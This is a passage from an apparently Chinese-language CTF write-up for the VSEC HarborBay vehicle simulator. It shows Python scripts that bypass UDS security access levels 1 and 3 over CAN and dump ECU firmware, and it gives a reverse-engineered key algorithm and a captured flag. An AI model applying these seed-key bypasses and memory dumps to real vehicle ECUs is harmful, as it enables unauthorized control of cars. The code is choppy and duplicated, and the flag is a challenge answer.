recvdata = binascii.hexlify(msg.data).decode('utf-8')[4:]
message = can.Message(arbitration_id=0x7E0, is_extended_id=False, dlc=8, data=[0x30, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00])
bus.send(message, timeout=0.2)
temp = 0
while temp < 36:
msg = bus.recv(timeout=0.2)
recvdata = binascii.hexlify(msg.data).decode('utf-8')[2:]
temp = temp + 1
感觉 isotp 或者 scapy 比 python-can 封装了好多东西啊,可以自动拆分和接收多帧报文,不然一点一点读好麻烦(脚本用了 pwnalone 的)
import isotp
import itertools
import struct
import sys
import time
0x62 : 3,
0x63 : 1,
0x67 : 2,
0x71 : 4,
0x74 : 2,
0x76 : 2,
0x7f : 0,
} # 方便筛选实际数据
p16, u16 = lambda x: struct.pack('>H', x), lambda x: struct.unpack('>H', x)[0]
p32, u32 = lambda x: struct.pack('>I', x), lambda x: struct.unpack('>I', x)[0]
p64, u64 = lambda x: struct.pack('>Q', x), lambda x: struct.unpack('>Q', x)[0]
s = isotp.socket()
s.bind('vcan0', isotp.Address(rxid=0x7e8, txid=0x7e0))
def reset():
s.send(bytes([ 0x11, 0x01 ]))
def level1():
s.send(bytes([ 0x27, 0x01 ])) # level1 req seed
reply = s.recv()
seed = reply[DATA_OFFS[reply[0]]:] # get seed
if seed != b'\0\0':
key = p32(u32(seed) ^ 0x20202020)
s.send(bytes([ 0x27, 0x02 ]) + key) # level1 send key
reply = s.recv()
data = reply[DATA_OFFS[reply[0]]:]
if data[0] != 0x7f:
print("no seed...")
def readmem_to_file(addr, size):
file = open("1.bin","wb")
dump = b''
step = 0x800
while step > 0:
step = min(step, size)
s.send(bytes([ 0x23, 0x44 ]) + p32(addr) + p32(step))
reply = s.recv()
if reply and reply == b'\x7f\x23\x22':
if reply and reply != b'\x7f\x23\x31':
addr += step
size -= step
step //= 2
readmem_to_file(0x400000, 0x100000)
最近发现可以下载文件了,但是只能下载文本文件(奇怪的限制),所以先 base64 把固件编码成文本 .txt 格式,在本机再转回去。dump 出来之后用 IDA 打开一看,哎,有个没交过的 flag,试试这个还真对了:bh{bit_twiddling_is_secure}
然而这题预期应该是想让我们找到 level3 的 UDS 安全访问算法的,那继续找找看,但是怎么找呢,固件没有符号,不太好分辨,单看字符串也找不到 level3 相关的代码,想根据 flag 去找结果发现没有引用
但是,等等!在 level1 的安全访问算法中我们异或了一个特定的值:0x20,能不能通过它来定位一下算法呢,通过搜索 20 字符串,然后再过滤异或操作,找到了异或 0x20 的函数
进来之后可以确定了,v9 这个变量就是安全访问的等级,那么后面这一长串就是 level3 的了,函数中还可以看到 0x35 也就是:密钥错误的 NRC
key[0] = (((seed[0] ^ seed[3]) + seed[0]) ^ 0xFE) - (16 * seed[3]) & 0xff
key[1] = (((seed[1] ^ seed[2]) + seed[1]) ^ 0xED) - (16 * seed[2]) & 0xff
key[2] = (((seed[3] ^ seed[1]) + seed[2]) ^ 0xFA) - (16 * seed[1]) & 0xff
key[3] = (((seed[2] ^ seed[0]) + seed[3]) ^ 0xCE) - (16 * seed[0]) & 0xff
import isotp
import itertools
import struct
import sys
import time
0x62 : 3,
0x63 : 1,
0x67 : 2,
0x71 : 4,
0x74 : 2,
0x76 : 2,
0x7f : 0,
} # 方便筛选实际数据
p16, u16 = lambda x: struct.pack('>H', x), lambda x: struct.unpack('>H', x)[0]
p32, u32 = lambda x: struct.pack('>I', x), lambda x: struct.unpack('>I', x)[0]
p64, u64 = lambda x: struct.pack('>Q', x), lambda x: struct.unpack('>Q', x)[0]
s = isotp.socket()
s.bind('vcan0', isotp.Address(rxid=0x7e8, txid=0x7e0))
def reset():
s.send(bytes([ 0x11, 0x01 ]))
def level1():
s.send(bytes([ 0x27, 0x01 ])) # level1 req seed
reply = s.recv()
seed = reply[DATA_OFFS[reply[0]]:] # get seed
if seed != b'\0\0':
key = p32(u32(seed) ^ 0x20202020)
s.send(bytes([ 0x27, 0x02 ]) + key) # level1 send key
reply = s.recv()
data = reply[DATA_OFFS[reply[0]]:]
if data[0] != 0x7f:
print("no seed...")
def level3():
s.send(bytes([ 0x27, 0x03 ])) # level3 req seed
reply = s.recv()
seed = reply[DATA_OFFS[reply[0]]:] # get seed
if seed != b'\0\0':
key = [0,0,0,0]
key[0] = (((seed[0] ^ seed[3]) + seed[0]) ^ 0xFE) - (16 * seed[3]) & 0xff
key[1] = (((seed[1] ^ seed[2]) + seed[1]) ^ 0xED) - (16 * seed[2]) & 0xff
key[2] = (((seed[3] ^ seed[1]) + seed[2]) ^ 0xFA) - (16 * seed[1]) & 0xff
key[3] = (((seed[2] ^ seed[0]) + seed[3]) ^ 0xCE) - (16 * seed[0]) & 0xff
s.send(bytes([ 0x27, 0x04, key[0], key[1], key[2], key[3]])) # level3 send key
reply = s.recv()
data = reply[DATA_OFFS[reply[0]]:]
if data[0] != 0x7f:
print("no seed...")
Security Access Level 5
题目:This challenge is within the Harborbay vehicle simulator on VSEC. From the home page, enter HarborBay. Select the Mach-E User Space Diagnostics Challenge Simulation, then launch the terminal.
I hear pseudo-random can be predicted, but we dont know how! Maybe you can prove it.
翻译:此挑战在 VSEC 上的 Harborbay 车辆模拟器内进行。从主页进入 HarborBay。选择 Mach-E 用户空间诊断挑战模拟,然后启动终端。